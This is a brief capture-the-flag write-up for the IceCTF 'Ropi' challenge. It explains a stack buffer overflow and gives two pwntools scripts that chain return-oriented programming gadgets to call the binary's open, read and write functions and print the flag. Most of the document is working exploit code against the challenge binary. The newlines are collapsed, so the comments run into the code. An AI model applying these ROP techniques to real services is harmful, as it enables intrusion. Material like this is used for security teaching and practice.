
IceCTF Ropi Writeup

This Problem took me few days but still i was unable to finish it .. but then my senior helped me out
This binary accepts a message which contains buffer .... yeah vulnerable to overflow !! But the thing you have to do is execute three func ret, ori , pro which open ,read, write the flag Yeah u have to do it by ROP .

from pwn import * context.bits=32 ret=0x8048569 ori=0x80485c4 pro=0x804862c popret=0x8048395 pop2ret=0x80486ee ezy=0x0804852d rete=0x804837e payload="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(ezy) payload2="B"*47+pack(ori)+pack(pop2ret)+pack(0xABCDEFFF)+pack(0x78563412)+pack(pro) print payload print payload2

The above one works , all credit goes to my senior but i will also post my payload which works locally not in the server don't know why but i learnt one thing
we can make everything in life much simpler than we think :)

from pwn import * context.bits=32 ret=0x8048569 ori=0x80485c4 pro=0x804862c popret=0x8048395 pop2ret=0x80486ee ezy=0x0804852d prop=0x0804863e rete=0x804837e payload="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(ezy) payload2="A"*44+pack(ori)+pack(pop2ret)+pack(0xABCDEFFF)+pack(0x78563412)+pack(prop) #payload3="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(pro) # binary starts p=process('ropi') #p=remote('',6500) msg=p.recvuntil('?\n') print msg p.sendline(payload) # for first read through main msg=p.recvuntil('?\n') print msg p.sendline(payload2) """msg=p.recvuntil('?\n') print msg+" read by exploit 2" p.sendline(payload3)""" msg=p.recvall() print msg